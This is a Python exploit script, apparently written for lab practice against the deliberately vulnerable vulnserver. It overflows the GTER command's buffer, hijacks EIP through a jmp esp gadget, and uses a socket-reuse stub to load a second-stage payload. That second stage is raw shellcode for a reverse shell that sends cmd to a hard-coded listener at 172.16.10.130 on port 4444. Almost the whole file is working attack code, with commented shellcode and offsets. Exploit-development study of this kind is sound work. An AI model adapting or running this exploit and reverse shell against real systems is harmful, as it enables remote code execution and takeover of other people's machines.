#!/usr/bin/python
import socket
import os
import sys
import struct
from time import sleep
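host = "172.16.10.129"  # vulnserver target (the reverse-shell callback host/port live inside `payload`, see below)
port = 9999
size = 174  # NOTE(review): unused -- an earlier variant padded the first stage with "B" up to this length
eip_offset = 151  # bytes of GTER argument data before the saved return address is overwritten
# Badchar \x00 (first stage only; the second stage arrives through recv() and is presumably not filtered the same way)
# 0x625011d3 : jmp esp | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (c:\Users\kartone\Desktop\vulnserver-master\essfunc.dll)
# Call to recv => CALL 0040252C
# SocketReuse to receive 2nd stage
#
# Stage 1 (39 bytes): socket-reuse stub. It re-uses the server's own recv()
# on the still-open client socket so the second stage is read straight into
# a stack buffer and then executed. All offsets below (0x188, 0xb0, 0x60)
# are tied to this vulnserver build's stack layout -- re-derive them in a
# debugger before pointing this at anything else.
#
# NOTE(review): the 8-bit/16-bit arithmetic (ADD CX / SUB DL / SUB BL) has no
# carry into the upper bytes, so it is only correct while ESP's low byte(s)
# do not wrap; a differently aligned stack silently sends the jumps elsewhere.
shellcode = b"".join([
    b"\x54",                  # PUSH ESP
    b"\x59",                  # POP ECX
    b"\x66\x81\xC1\x88\x01",  # ADD CX, 0x188   -> ECX = stack slot that (presumably) holds the client socket
    b"\x54",                  # PUSH ESP
    b"\x5a",                  # POP EDX
    b"\x80\xEA\xB0",          # SUB DL, 0xb0
    b"\x89\xd4",              # MOV ESP, EDX    -> move the stack down so the pushes below do not clobber the stub
    b"\x31\xc0",              # XOR EAX, EAX
    b"\x50",                  # PUSH EAX        ; param 1: flags = 0
    b"\x80\xC4\x04",          # ADD AH, 4       -> EAX = 0x400
    b"\x50",                  # PUSH EAX        ; param 2: len = 0x400
    b"\x54",                  # PUSH ESP
    b"\x58",                  # POP EAX
    b"\x83\xC0\x60",          # ADD EAX, 0x60
    b"\x50",                  # PUSH EAX        ; param 3: buf = ESP + 0x60
    b"\xff\x31",              # PUSH DWORD PTR DS:[ECX] ; param 4: socket
    b"\xB8\xAA\x2C\x25\x40",  # MOV EAX, 0x40252CAA
    b"\xC1\xE8\x08",          # SHR EAX, 8      -> EAX = 0x0040252C without a literal NUL byte
    b"\xff\xd0",              # CALL EAX        ; recv(socket, buf, 0x400, 0)
])
nop_align = b"\x90" * 3  # small alignment pad in front of the stub
buffer = nop_align + shellcode
buffer += b"\x90" * (eip_offset - len(buffer))  # NOP-fill up to the saved return address
buffer += struct.pack("<L", 0x625011d3)  # EIP -> jmp esp in essfunc.dll (no NUL bytes in the packed address)
# Executed by the jmp esp: PUSH ESP / POP EBX / SUB BL, 155 / JMP EBX.
# After the ret, ESP points just past the overwritten EIP (buffer offset
# 151 + 4 = 155), so subtracting 155 lands EBX on offset 0, i.e. nop_align.
buffer += b"\x54\x5b\x80\xEB\x9b\xff\xe3"
buffer += b"\x41"  # padding
command = b"GTER " + buffer
# Refuse to send a first stage that contains the known bad character; a
# mangled stage is much harder to debug than an early error here.
if b"\x00" in command:
    raise ValueError("first stage contains a NUL byte, which is a bad character for GTER")
# Stage 2: custom reverse shell. It sidesteps ASLR by taking the base
# addresses of WS2_32 and Kernel32 from pointers found on the stack at run
# time, then builds the calls to WSASocketA, WS2_32.connect and
# CreateProcessA from those addresses.
# The listener is hard-coded inside the blob: "\x68\xac\x10\x0a\x82" appears
# to push the callback address 172.16.10.130 and "\x66\x68\x11\x5c" the port
# 0x115c (4444); "\xba\x63\x63\x6d\x64\xc1\xea\x08" builds the NUL-terminated
# string "cmd" without a literal NUL. Edit those bytes to retarget the shell.
payload = b""
payload += b"\x31\xd2\x89\xe2\x83\xea\x38\x8b\x12\x66\xba\x2a\xc8\x31\xc0\x50\x50\x50\x31\xdb\xb3\x06\x53\x40\x50\x40\x50\x89\xd3\x31\xc0\xff\xd3\x96\x66\xbb\xdd\x6b\x93\x68\xac\x10\x0a\x82\x66\x68\x11\x5c\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x56\xff\xd0\x31\xd2\x89\xe2\x81\xea\x9c\xf9\xff\xff\x8b\x12\x66\xba\x72\x10\x89\xd7\xba\x63\x63\x6d\x64\xc1\xea\x08\x52\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x56\x56\x56\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50\x52\x52\x51\x52\xff\xd7"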
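s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# A finite timeout keeps the script from hanging forever on the final recv()
# if the hijacked handler thread never answers.
s.settimeout(10)
try:
    print("[+] Connecting to the server...")
    s.connect((host, port))
    print(s.recv(1024))  # banner
    print("[+] Sending evil payload...")
    # sendall() keeps going until every byte is queued; a short send() would
    # leave the first stage truncated and the stack layout the stub expects broken.
    s.sendall(command)
    print("[+] Sending second payload...")
    # Give the first stage time to (presumably) reach its recv() before the second stage arrives.
    sleep(2)
    s.sendall(payload)
    print("[+] Second payload sent! Check your netcat...")
    try:
        print(s.recv(1024))
    except socket.timeout:
        print("[-] No reply from the server (may be normal once the handler thread has been hijacked)")
finally:
    # Always release the socket, even if connect()/send() raised above.
    s.close()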